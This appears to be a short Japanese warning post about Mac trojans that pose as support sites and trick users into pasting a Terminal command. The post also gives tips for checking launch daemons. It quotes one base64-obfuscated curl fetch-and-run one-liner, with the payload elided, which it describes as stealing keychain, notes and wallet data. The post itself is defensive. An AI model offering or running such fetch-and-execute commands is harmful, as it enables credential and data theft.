最近のトロイの木馬の中には、Macのテクニカルサポートやチュートリアルのウェブサイトを装い、よくある問題の解決方法を案内したり、ユーザーの信頼を築いたりするものがあります。そして最後に、「ターミナルにコピー&ペースト」するコマンドを提示してきます。
コマンド内容:
bin/bash -c "$(curl -fsSL $(echo [long_string] | base64 -d))"
これを実行して管理者パスワードを入力すると、キーチェーンのパスワード、メモの内容、暗号通貨ウォレットのデータが盗まれ、圧縮された後、攻撃者のサーバーにアップロードされます。これは標的型窃盗型のトロイの木馬です。
したがって、オンラインソースからコマンドを盲目的にコピーしないでください。
同様に、海賊版Macソフトウェア用の多くのクラックされたプラグインは、クラックされたコマンドを隠蔽し、ダブルクリックして管理者パスワードを入力するように要求することがあります。私も以前に同様の経験をしたことがあり、自分のMacがウイルスに感染しているかどうか確信が持てません。
したがって、ターミナルでコマンドを実行する際は、必ず悪意のあるコードが含まれていないか確認してください。コマンドコードが表示されない場合は、管理者パスワードを入力しないでください。
コンピュータに不安がある場合は、ターミナルで
ls /Library/LaunchAgents
と
ls /Library/LaunchDaemons
と入力して、説明のつかないデーモンがないか確認してください。もし存在する場合は、バックアップを取り、削除してからコンピュータを再起動してください。
追記:デーモンが多数存在する場合は、それらを整理してドキュメントを作成し、ChatGPTにレビューを依頼することをお勧めします。
参考記事
Mac-Support gesucht, Malware gefunden: Trickbetrüger verbreiten Trojaner per Kommandozeilenbefehl:https://www.mactechnews.de/news/article/Mac-Support-gesucht-Malware-gefunden-Trickbetrueger-verbreiten-Trojaner-per-Kommandozeilenbefehl-187809.html